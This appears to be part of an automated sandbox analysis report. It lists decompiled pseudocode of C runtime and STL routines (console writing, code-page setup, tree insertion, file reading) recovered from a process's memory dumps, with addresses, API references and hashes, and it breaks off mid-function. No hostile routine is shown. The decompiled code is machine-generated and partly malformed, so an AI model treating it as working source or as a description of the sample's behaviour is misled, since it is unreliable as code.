							E00E87AE8( &_v60, __eflags);
							E00EA4B2D();
							return _t145;
						} else {
							_t143 = _v8;
							E00E8BBA2(__eflags, _t143);
							 *((intOrPtr*)( *_t143 + 4))();
							 *0xeaae84 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t139;
						goto L5;
					}
				}
			}

0x00e8767b
0x00e87680
0x00e8768b
0x00e8768e
0x00e87693
0x00e8769c
0x00e876a0
0x00e876d4
0x00e876d7
0x00e876e1
0x00e876a2
0x00e876a4
0x00e876b8
0x00e876bb
0x00e876e2
0x00e876e5
0x00e876f3
0x00e876f8
0x00e876f9
0x00e87700
0x00e87705
0x00e87708
0x00e8770a
0x00e8770d
0x00e87711
0x00e87714
0x00e87716
0x00e87719
0x00e87719
0x00e8771b
0x00e8771c
0x00e8771c
0x00e87720
0x00e87722
0x00e87727
0x00e8772a
0x00e8772e
0x00e87732
0x00e87734
0x00e8774c
0x00e8774c
0x00e8774f
0x00e87754
0x00e87757
0x00e87736
0x00e87736
0x00e87746
0x00e87746
0x00e87748
0x00e87738
0x00e87738
0x00e8773a
0x00000000
0x00e8773c
0x00e8773c
0x00e8773e
0x00000000
0x00e87740
0x00e87740
0x00000000
0x00e87742
0x00e87742
0x00e87744
0x00000000
0x00000000
0x00000000
0x00000000
0x00e87744
0x00e87740
0x00e8773e
0x00e8773a
0x00e87736
0x00e8775a
0x00e87761
0x00e87766
0x00e8776a
0x00e87774
0x00e87777
0x00e87779
0x00e87785
0x00e87788
0x00e877ca
0x00e877da
0x00e877dd
0x00e877e0
0x00000000
0x00e877e2
0x00e877e2
0x00e877e4
0x00000000
0x00e877e6
0x00e877e6
0x00e877e9
0x00e877e9
0x00e877eb
0x00000000
0x00000000
0x00e877ed
0x00e877f3
0x00e877fc
0x00e87806
0x00e8780b
0x00e8780e
0x00e87818
0x00e8781b
0x00e8781e
0x00e87821
0x00e87824
0x00e87827
0x00000000
0x00000000
0x00000000
0x00000000
0x00e877ef
0x00e877ef
0x00e877f1
0x00000000
0x00000000
0x00000000
0x00000000
0x00e877f1
0x00000000
0x00e877ed
0x00e8782c
0x00e8782c
0x00e877e4
0x00e8778a
0x00e8778a
0x00e8778d
0x00e8778d
0x00e8778f
0x00000000
0x00000000
0x00e87791
0x00e87797
0x00e877a0
0x00e877aa
0x00e877af
0x00e877b2
0x00e87810
0x00e87812
0x00e87813
0x00e877b4
0x00e877b4
0x00e877b7
0x00e877ba
0x00e877bd
0x00e877c0
0x00e877c3
0x00000000
0x00e877c3
0x00e87793
0x00e87793
0x00e87795
0x00000000
0x00000000
0x00000000
0x00000000
0x00e87795
0x00000000
0x00e87791
0x00e877c8
0x00000000
0x00e877c8
0x00e8782e
0x00e87830
0x00e87833
0x00e87837
0x00e8783b
0x00e8776c
0x00e8776e
0x00e8776e
0x00e8786d
0x00e8786f
0x00e87877
0x00e8787e
0x00e87883
0x00e876bd
0x00e876bd
0x00e876c1
0x00e876cb
0x00e876ce
0x00000000
0x00e876ce
0x00e876a6
0x00e876a6
0x00000000
0x00e876a6
0x00e876a4

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E8767B

Part of subcall function 00E83598: std::_Lockit::_Lockit.LIBCPMT ref: 00E835A9
Part of subcall function 00E83598: std::_Lockit::~_Lockit.LIBCPMT ref: 00E835C3

std::_Facet_Register.LIBCPMT ref: 00E876C1
std::_Lockit::~_Lockit.LIBCPMT ref: 00E876D7
__CxxThrowException@8.LIBVCRUNTIME ref: 00E876F3

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID:
API String ID: 2536120697-0
Opcode ID: bebc279f998886689ee17e7953dc8b9028fd97ad716bc87c9240970b20d8dc9d
Instruction ID: debe8b60bcba7ebb49d4617f8a6670f2d49512ac5fe0d5fe962a7ba2b185deb5
Opcode Fuzzy Hash: bebc279f998886689ee17e7953dc8b9028fd97ad716bc87c9240970b20d8dc9d
Instruction Fuzzy Hash: D201D232900514ABCB01FBA8D90589D7BF8EF85750B242155F94DBB291EF30EF41D790

Uniqueness

Uniqueness Score: -1.00%

Function 00EA4782, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EA4782(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xea99a0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00EA476B();
					E00EA472D();
					_t13 = WriteConsoleW( *0xea99a0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x00ea479f
0x00ea47a3
0x00ea47b0
0x00ea47b5
0x00ea47d0
0x00ea47d0
0x00ea47d6

APIs

WriteConsoleW.KERNEL32(00E913E1,?,?,00000000,00E913E1,?,00EA424E,00E913E1,00000001,00E913E1,00E913E1,?,00EA268D,00000000,8304488B,00E913E1), ref: 00EA4799
GetLastError.KERNEL32(?,00EA424E,00E913E1,00000001,00E913E1,00E913E1,?,00EA268D,00000000,8304488B,00E913E1,00000000,00E913E1,?,00EA2BE1,00000010), ref: 00EA47A5

Part of subcall function 00EA476B: CloseHandle.KERNEL32(FFFFFFFE,00EA47B5,?,00EA424E,00E913E1,00000001,00E913E1,00E913E1,?,00EA268D,00000000,8304488B,00E913E1,00000000,00E913E1), ref: 00EA477B

___initconout.LIBCMT ref: 00EA47B5

Part of subcall function 00EA472D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EA475C,00EA423B,00E913E1,?,00EA268D,00000000,8304488B,00E913E1,00000000), ref: 00EA4740

WriteConsoleW.KERNEL32(00E913E1,?,?,00000000,?,00EA424E,00E913E1,00000001,00E913E1,00E913E1,?,00EA268D,00000000,8304488B,00E913E1,00000000), ref: 00EA47CA

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 7aedddf15174267892c16c370b880657bb5b50fabca4a114d576e982acef4e55
Instruction ID: f320c2442f029cd8d9d5d98e2d00db1be4dec01c7d79d137770e8cf7737dc34d
Opcode Fuzzy Hash: 7aedddf15174267892c16c370b880657bb5b50fabca4a114d576e982acef4e55
Instruction Fuzzy Hash: 06F01C36512155BFCF226F92DC0898A7F66EF8F3A1B004015FA08B9560C772A825DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E9A693, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00E9A693(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t51;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t76;
				signed char* _t77;
				int _t80;
				signed int _t85;
				signed char* _t86;
				short* _t87;
				signed int _t88;
				signed char _t89;
				signed int _t90;
				intOrPtr* _t91;
				signed int _t92;
				signed int _t93;
				short _t95;
				signed int _t96;
				intOrPtr _t99;
				signed int _t100;

				_t51 =  *0xea9014; // 0xa413846
				_v8 = _t51 ^ _t100;
				_t99 = _a8;
				_t80 = E00E9A22C(__eflags, _a4);
				if(_t80 == 0) {
					L36:
					E00E9A29F(_t99);
					goto L37;
				} else {
					_t95 = 0;
					_t85 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0xea9810)) != _t80) {
						_t85 = _t85 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t85;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t80 == 0xfde8 || IsValidCodePage(_t80 & 0x0000ffff) == 0) {
								L22:
							} else {
								if(_t80 != 0xfde9) {
									_t57 = GetCPInfo(_t80,  &_v28);
									__eflags = _t57;
									if(_t57 == 0) {
										__eflags =  *0xeaa8dc - _t95; // 0x0
										if(__eflags != 0) {
											goto L36;
										} else {
											goto L22;
										}
									} else {
										_t14 = _t99 + 0x18; // 0x19
										E00E8D0F0(_t95, _t14, _t95, 0x101);
										 *(_t99 + 4) = _t80;
										__eflags = _v28 - 2;
										 *((intOrPtr*)(_t99 + 0x21c)) = _t95;
										if(_v28 == 2) {
											__eflags = _v22;
											_t76 =  &_v22;
											if(_v22 != 0) {
												while(1) {
													_t89 = _t76[1];
													__eflags = _t89;
													if(_t89 == 0) {
														goto L18;
													}
													_t93 = _t89 & 0x000000ff;
													_t90 =  *_t76 & 0x000000ff;
													while(1) {
														__eflags = _t90 - _t93;
														if(_t90 > _t93) {
															break;
														}
														 *(_t99 + _t90 + 0x19) =  *(_t99 + _t90 + 0x19) | 0x00000004;
														_t90 = _t90 + 1;
														__eflags = _t90;
													}
													_t76 =  &(_t76[2]);
													__eflags =  *_t76;
													if( *_t76 != 0) {
														continue;
													}
													goto L18;
												}
											}
											L18:
											_t25 = _t99 + 0x1a; // 0x1b
											_t77 = _t25;
											_t88 = 0xfe;
											do {
												 *_t77 =  *_t77 | 0x00000008;
												_t77 =  &(_t77[1]);
												_t88 = _t88 - 1;
												__eflags = _t88;
											} while (_t88 != 0);
											 *((intOrPtr*)(_t99 + 0x21c)) = E00E9A1EE( *(_t99 + 4));
											_t95 = 1;
										}
										goto L8;
									}
								} else {
									 *(_t99 + 4) = 0xfde9;
									 *((intOrPtr*)(_t99 + 0x21c)) = _t95;
									 *((intOrPtr*)(_t99 + 0x18)) = _t95;
									 *((short*)(_t99 + 0x1c)) = _t95;
									L8:
									 *((intOrPtr*)(_t99 + 8)) = _t95;
									_t12 = _t99 + 0xc; // 0xd
									_t96 = _t12;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L9:
									E00E9A304(_t80, _t96, _t99, _t99);
									L37:
								}
							}
						}
						goto L38;
					}
					_t28 = _t99 + 0x18; // 0x19
					E00E8D0F0(_t95, _t28, _t95, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0xea9820;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t86 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t86[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t92 =  *_t86 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t67;
									if(_t92 > _t67) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t34 = _t95 + 0xea9808; // 0x8040201
										 *(_t99 + _t92 + 0x19) =  *(_t99 + _t92 + 0x19) |  *_t34;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t67 = _t86[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t86 =  &(_t86[2]);
								__eflags =  *_t86;
								if( *_t86 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t95 = _t95 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t95 - 4;
					} while (_t95 < 4);
					 *(_t99 + 4) = _t80;
					 *((intOrPtr*)(_t99 + 8)) = 1;
					 *((intOrPtr*)(_t99 + 0x21c)) = E00E9A1EE(_t80);
					_t46 = _t99 + 0xc; // 0xd
					_t87 = _t46;
					_t91 = _v36 + 0xea9814;
					_t96 = 6;
					do {
						_t64 =  *_t91;
						_t91 = _t91 + 2;
						 *_t87 = _t64;
						_t87 = _t87 + 2;
						_t96 = _t96 - 1;
						__eflags = _t96;
					} while (_t96 != 0);
					goto L9;
				}
				L38:
				return E00E8AE43(_v8 ^ _t100);
			}

0x00e9a69b
0x00e9a6a2
0x00e9a6a7
0x00e9a6b3
0x00e9a6b8
0x00e9a86e
0x00e9a86f
0x00000000
0x00e9a6be
0x00e9a6be
0x00e9a6c0
0x00e9a6c2
0x00e9a6c4
0x00e9a6c7
0x00e9a6d3
0x00e9a6d4
0x00e9a6d7
0x00e9a6df
0x00000000
0x00e9a6e1
0x00e9a6e7
0x00e9a7be
0x00e9a6ff
0x00e9a706
0x00e9a733
0x00e9a739
0x00e9a73b
0x00e9a7b2
0x00e9a7b8
0x00000000
0x00000000
0x00000000
0x00000000
0x00e9a73d
0x00e9a742
0x00e9a747
0x00e9a74f
0x00e9a752
0x00e9a756
0x00e9a75c
0x00e9a75e
0x00e9a762
0x00e9a765
0x00e9a767
0x00e9a767
0x00e9a76a
0x00e9a76c
0x00000000
0x00000000
0x00e9a76e
0x00e9a771
0x00e9a77c
0x00e9a77c
0x00e9a77e
0x00000000
0x00000000
0x00e9a776
0x00e9a77b
0x00e9a77b
0x00e9a77b
0x00e9a780
0x00e9a783
0x00e9a786
0x00000000
0x00000000
0x00000000
0x00e9a786
0x00e9a767
0x00e9a788
0x00e9a788
0x00e9a788
0x00e9a78b
0x00e9a790
0x00e9a790
0x00e9a793
0x00e9a794
0x00e9a794
0x00e9a794
0x00e9a7a3
0x00e9a7ac
0x00e9a7ac
0x00000000
0x00e9a75c
0x00e9a708
0x00e9a708
0x00e9a70b
0x00e9a711
0x00e9a714
0x00e9a718
0x00e9a718
0x00e9a71d
0x00e9a71d
0x00e9a720
0x00e9a721
0x00e9a722
0x00e9a723
0x00e9a724
0x00e9a874
0x00e9a876
0x00e9a706
0x00e9a6e7
0x00000000
0x00e9a6df
0x00e9a7cb
0x00e9a7d0
0x00e9a7d8
0x00e9a7d8
0x00e9a7dc
0x00e9a7df
0x00e9a7e5
0x00e9a7e8
0x00e9a7e8
0x00e9a7eb
0x00e9a7ed
0x00e9a7ef
0x00e9a7ef
0x00e9a7f2
0x00e9a7f4
0x00000000
0x00000000
0x00e9a7f6
0x00e9a7f9
0x00e9a815
0x00e9a815
0x00e9a817
0x00000000
0x00000000
0x00e9a7fe
0x00e9a804
0x00e9a806
0x00e9a80c
0x00e9a810
0x00e9a810
0x00e9a811
0x00000000
0x00e9a811
0x00000000
0x00e9a804
0x00e9a819
0x00e9a81c
0x00e9a81f
0x00000000
0x00000000
0x00000000
0x00e9a81f
0x00e9a821
0x00e9a821
0x00e9a824
0x00e9a825
0x00e9a828
0x00e9a82b
0x00e9a82b
0x00e9a831
0x00e9a834
0x00e9a843
0x00e9a84c
0x00e9a84c
0x00e9a851
0x00e9a857
0x00e9a858
0x00e9a858
0x00e9a85b
0x00e9a85e
0x00e9a861
0x00e9a864
0x00e9a864
0x00e9a864
0x00000000
0x00e9a869
0x00e9a877
0x00e9a887

APIs

Part of subcall function 00E9A22C: GetOEMCP.KERNEL32(00000000,00E9A4A2,00000001,00000002,00E98F84,00E98F84,00000002,00000000,00000001), ref: 00E9A257

IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,?,?,00E9A4E9,00000000,00000000,00000001,?,00000000,?,?,?,00E98F84), ref: 00E9A6F1
GetCPInfo.KERNEL32(00000000,00E9A4E9,?,?,00E9A4E9,00000000,00000000,00000001,?,00000000,?,?,?,00E98F84,00000002,00000000), ref: 00E9A733

Strings

F8A/, xrefs: 00E9A69B

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID: F8A/
API String ID: 546120528-73971870
Opcode ID: 0e11797bcbea3d6712e95b5e6af17898136a4c1da8c9e4e6a214681752f6f36a
Instruction ID: 141bc0f8e03a42b2dcaa7c392c198ed713d1851a330bc2bfbffa12184b11a86a
Opcode Fuzzy Hash: 0e11797bcbea3d6712e95b5e6af17898136a4c1da8c9e4e6a214681752f6f36a
Instruction Fuzzy Hash: E15145709003419EDF248FB6C8426BABBF5EF41308F2C647FD096A7251D2359A46CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00E88521, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00E88521(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr* _a4, char _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				signed char _v28;
				intOrPtr _t79;
				signed char _t83;
				void* _t85;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr _t91;
				intOrPtr* _t92;
				void* _t93;
				intOrPtr* _t96;
				intOrPtr* _t100;
				intOrPtr* _t101;
				void* _t120;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr* _t136;
				intOrPtr* _t137;
				intOrPtr* _t138;

				_t124 = __ecx;
				_t120 = __ebx;
				_t79 =  *((intOrPtr*)(__ecx + 4));
				if(_t79 >= 0x3fffffe) {
					E00E884B2(_a20);
					E00E8BE84("map/set<T> too long");
					asm("int3");
					_push(0xc);
					E00EA4BBE();
					_t121 = _t124;
					_v8 = _v8 & 0x00000000;
					_t132 =  *_t121;
					_t136 =  *((intOrPtr*)(_t132 + 4));
					_t83 = 1;
					_v28 = 1;
					while( *((char*)(_t136 + 0xd)) == 0) {
						_t132 = _t136;
						_t52 = _t136 + 0x10; // 0x10
						_t93 = _t52;
						if(_a8 == 0) {
							_t83 = E00E86D65(_a12, _t93);
						} else {
							_t83 = E00E86D65(_t93, _a12) ^ 0x00000001;
						}
						_v28 = _t83;
						if(_t83 == 0) {
							_t136 =  *((intOrPtr*)(_t136 + 8));
						} else {
							_t136 =  *_t136;
						}
					}
					_t137 = _t132;
					_v24 = _t137;
					if(_t83 == 0) {
						L47:
						_t74 = _t137 + 0x10; // 0x11
						_t85 = E00E86D65(_t74, _a12);
						_push(_a16);
						if(_t85 == 0) {
							E00E884B2();
							_t87 = _a4;
							 *_t87 = _t137;
							 *((char*)(_t87 + 4)) = 0;
						} else {
							_push(_t124);
							_push(_t132);
							_push(_v28);
							goto L35;
						}
					} else {
						if(_t132 !=  *((intOrPtr*)( *_t121))) {
							if( *((char*)(_t132 + 0xd)) == 0) {
								_t91 =  *_t132;
								if( *((char*)(_t91 + 0xd)) == 0) {
									do {
										_t137 = _t91;
										_t91 =  *((intOrPtr*)(_t137 + 8));
									} while ( *((char*)(_t91 + 0xd)) == 0);
									goto L46;
								} else {
									while(1) {
										_t92 =  *((intOrPtr*)(_t137 + 4));
										if( *((char*)(_t92 + 0xd)) != 0 || _t137 !=  *_t92) {
											break;
										}
										_t137 = _t92;
										_v24 = _t137;
									}
									if( *((char*)(_t137 + 0xd)) == 0) {
										_t137 = _t92;
										goto L46;
									}
								}
							} else {
								_t137 =  *((intOrPtr*)(_t132 + 8));
								L46:
								_v24 = _t137;
							}
							goto L47;
						} else {
							_push(_a16);
							_push(_t124);
							_push(_t132);
							_push(1);
							L35:
							_push( &_a8);
							_t89 = E00E88521(_t121, _t121, _t132, _t137);
							_t87 = _a4;
							 *_t87 =  *_t89;
							 *((char*)(_t87 + 4)) = 1;
						}
					}
					E00EA4B2D();
					return _t87;
				} else {
					_push(__esi);
					_push(__edi);
					_t133 = _a20;
					 *((intOrPtr*)(__ecx + 4)) = _t79 + 1;
					_t96 = _a12;
					 *((intOrPtr*)(_t133 + 4)) = _t96;
					_t127 =  *__ecx;
					if(_t96 != _t127) {
						if(_a8 == 0) {
							 *((intOrPtr*)(_t96 + 8)) = _t133;
							_t128 =  *__ecx;
							if(_t96 ==  *((intOrPtr*)(_t128 + 8))) {
								 *((intOrPtr*)(_t128 + 8)) = _t133;
							}
						} else {
							 *_t96 = _t133;
							_t130 =  *__ecx;
							if(_t96 ==  *_t130) {
								 *_t130 = _t133;
							}
						}
					} else {
						 *((intOrPtr*)(_t127 + 4)) = _t133;
						 *((intOrPtr*)( *__ecx)) = _t133;
						 *((intOrPtr*)( *__ecx + 8)) = _t133;
					}
					_t138 = _t133;
					if( *((char*)( *((intOrPtr*)(_t133 + 4)) + 0xc)) == 0) {
						_push(_t120);
						do {
							_t101 =  *((intOrPtr*)(_t138 + 4));
							_t122 =  *((intOrPtr*)(_t101 + 4));
							_t129 =  *_t122;
							if(_t101 != _t129) {
								if( *((char*)(_t129 + 0xc)) != 0) {
									if(_t138 ==  *_t101) {
										_t138 = _t101;
										E00E875CA(_t124, _t138);
									}
									 *((char*)( *((intOrPtr*)(_t138 + 4)) + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)) + 0xc)) = 0;
									E00E8760D(_t124,  *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)));
								} else {
									goto L16;
								}
							} else {
								_t129 =  *((intOrPtr*)(_t122 + 8));
								if( *((char*)(_t129 + 0xc)) == 0) {
									L16:
									 *((char*)(_t101 + 0xc)) = 1;
									 *((char*)(_t129 + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)) + 0xc)) = 0;
									_t138 =  *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4));
								} else {
									if(_t138 ==  *((intOrPtr*)(_t101 + 8))) {
										_t138 = _t101;
										E00E8760D(_t124, _t138);
									}
									 *((char*)( *((intOrPtr*)(_t138 + 4)) + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)) + 0xc)) = 0;
									E00E875CA(_t124,  *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)));
								}
							}
						} while ( *((char*)( *((intOrPtr*)(_t138 + 4)) + 0xc)) == 0);
					}
					 *((char*)( *((intOrPtr*)( *_t124 + 4)) + 0xc)) = 1;
					_t100 = _a4;
					 *_t100 = _t133;
					return _t100;
				}
			}

0x00e88521
0x00e88521
0x00e88524
0x00e8852c
0x00e88631
0x00e8863b
0x00e88640
0x00e88641
0x00e88648
0x00e8864d
0x00e8864f
0x00e88653
0x00e88655
0x00e88658
0x00e8865a
0x00e8865d
0x00e88663
0x00e88665
0x00e88665
0x00e8866c
0x00e8867f
0x00e8866e
0x00e88677
0x00e88677
0x00e88684
0x00e88689
0x00e8868f
0x00e8868b
0x00e8868b
0x00e8868b
0x00e88689
0x00e88694
0x00e88696
0x00e8869b
0x00e88707
0x00e8870a
0x00e8870e
0x00e88713
0x00e88718
0x00e88721
0x00e88726
0x00e88729
0x00e8872b
0x00e8871a
0x00e8871a
0x00e8871b
0x00e8871c
0x00000000
0x00e8871c
0x00e8869d
0x00e886a1
0x00e886cc
0x00e886d3
0x00e886d9
0x00e886f9
0x00e886f9
0x00e886fb
0x00e886fe
0x00000000
0x00e886db
0x00e886db
0x00e886db
0x00e886e2
0x00000000
0x00000000
0x00e886e8
0x00e886ea
0x00e886ea
0x00e886f3
0x00e886f5
0x00000000
0x00e886f5
0x00e886f3
0x00e886ce
0x00e886ce
0x00e88704
0x00e88704
0x00e88704
0x00000000
0x00e886a3
0x00e886a3
0x00e886a6
0x00e886a7
0x00e886a8
0x00e886aa
0x00e886ad
0x00e886b0
0x00e886b7
0x00e886ba
0x00e886bc
0x00e886bc
0x00e886a1
0x00e886c0
0x00e886c5
0x00e88532
0x00e88532
0x00e88533
0x00e88534
0x00e88538
0x00e8853b
0x00e8853e
0x00e88541
0x00e88545
0x00e88559
0x00e88567
0x00e8856a
0x00e8856f
0x00e88571
0x00e88571
0x00e8855b
0x00e8855b
0x00e8855d
0x00e88561
0x00e88563
0x00e88563
0x00e88561
0x00e88547
0x00e88547
0x00e8854c
0x00e88550
0x00e88550
0x00e88577
0x00e8857d
0x00e88583
0x00e88584
0x00e88584
0x00e88587
0x00e8858a
0x00e8858e
0x00e885c8
0x00e885e6
0x00e885e8
0x00e885eb
0x00e885eb
0x00e885f3
0x00e885fd
0x00e88607
0x00000000
0x00000000
0x00000000
0x00e88590
0x00e88590
0x00e88597
0x00e885ca
0x00e885ca
0x00e885ce
0x00e885d8
0x00e885df
0x00e88599
0x00e8859c
0x00e8859e
0x00e885a1
0x00e885a1
0x00e885a9
0x00e885b3
0x00e885bd
0x00e885bd
0x00e88597
0x00e8860f
0x00e88619
0x00e8861f
0x00e88623
0x00e88626
0x00e8862b
0x00e8862b

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00E8863B
__EH_prolog3_catch.LIBCMT ref: 00E88648

Strings

map/set<T> too long, xrefs: 00E88636

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_catchXinvalid_argumentstd::_
String ID: map/set<T> too long
API String ID: 4202626062-1285458680
Opcode ID: 2b4f09e17a0fdb86c6182e3c6b7cf716e718c36c1e98a32864026226e8686f36
Instruction ID: 863c047d98c7b686225e77013017535b144dbe02074475b22723b3c88f0120df
Opcode Fuzzy Hash: 2b4f09e17a0fdb86c6182e3c6b7cf716e718c36c1e98a32864026226e8686f36
Instruction Fuzzy Hash: FD5157706046809FDB11EF18C284B55FBE1AF56328F59D589E89CAB3A2C775EC80DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E90D89, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00E90D89(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void _v4104;
				signed int _v4108;
				signed int _v4112;
				long _v4116;
				signed int _v4120;
				intOrPtr _v4124;
				signed int _t45;
				signed int _t47;
				signed int _t51;
				intOrPtr _t52;
				int _t57;
				signed int _t58;
				long _t59;
				signed char _t63;
				signed int _t67;
				signed int _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t81;
				signed int _t83;
				signed int _t84;
				signed int _t89;
				void* _t92;
				signed int _t95;
				void* _t97;
				signed int _t98;

				E00EA4F80();
				_t45 =  *0xea9014; // 0xa413846
				_v8 = _t45 ^ _t98;
				_t47 = E00E972EE(_a4);
				_t74 = _a4;
				_t70 = _t47;
				if( *((intOrPtr*)(_a4 + 8)) != 0) {
					asm("cdq");
					_v4108 = E00EA4ED0( *_t74 -  *((intOrPtr*)(_t74 + 4)), _t83, 2, 0);
					_v4120 = _t83;
					_t89 = (_t70 & 0x0000003f) * 0x38;
					_t95 = _t70 >> 6;
					_t51 = E00E972B8(_t70,  *((intOrPtr*)(_t89 +  *((intOrPtr*)(0xeaa6c8 + _t95 * 4)) + 0x20)),  *((intOrPtr*)(_t89 +  *((intOrPtr*)(0xeaa6c8 + _t95 * 4)) + 0x24)), 0);
					_t78 =  *((intOrPtr*)(0xeaa6c8 + _t95 * 4));
					_v4112 = _t51;
					_t52 = _t83;
					_t84 = _v4112;
					_v4124 = _t52;
					__eflags = _t84 -  *((intOrPtr*)(_t89 + _t78 + 0x20));
					if(_t84 !=  *((intOrPtr*)(_t89 + _t78 + 0x20))) {
						L22:
						__eflags = _t84 | 0xffffffff;
						L23:
						goto L24;
					}
					__eflags = _t52 -  *((intOrPtr*)(_t89 + _t78 + 0x24));
					if(_t52 !=  *((intOrPtr*)(_t89 + _t78 + 0x24))) {
						goto L22;
					}
					_t57 = ReadFile( *(_t89 + _t78 + 0x18),  &_v4104, 0x1000,  &_v4116, 0);
					__eflags = _t57;
					if(_t57 == 0) {
						goto L22;
					}
					_t58 = E00E972B8(_t70, _a8, _a12, 0);
					__eflags = _t84;
					if(__eflags < 0) {
						goto L22;
					}
					if(__eflags > 0) {
						L8:
						_t72 = _v4120;
						_t59 = _v4116;
						__eflags = _t72;
						if(__eflags > 0) {
							goto L22;
						}
						if(__eflags < 0) {
							L11:
							_t92 =  &_v4104 + _t59;
							_t81 =  &_v4104;
							_t97 = 0;
							__eflags = _v4108;
							if(_v4108 != 0) {
								while(1) {
									L13:
									__eflags = _t81 - _t92;
									if(_t81 >= _t92) {
										break;
									}
									_t63 =  *_t81;
									__eflags = _t63 - 0xd;
									if(_t63 != 0xd) {
										_t81 = _t81 +  *((char*)((_t63 & 0x000000ff) + 0xea91d8));
										__eflags = _t81;
									} else {
										__eflags = _t81 - _t92 - 1;
										if(_t81 < _t92 - 1) {
											_t67 = _t81 + 1;
											__eflags =  *_t67 - 0xa;
											if( *_t67 == 0xa) {
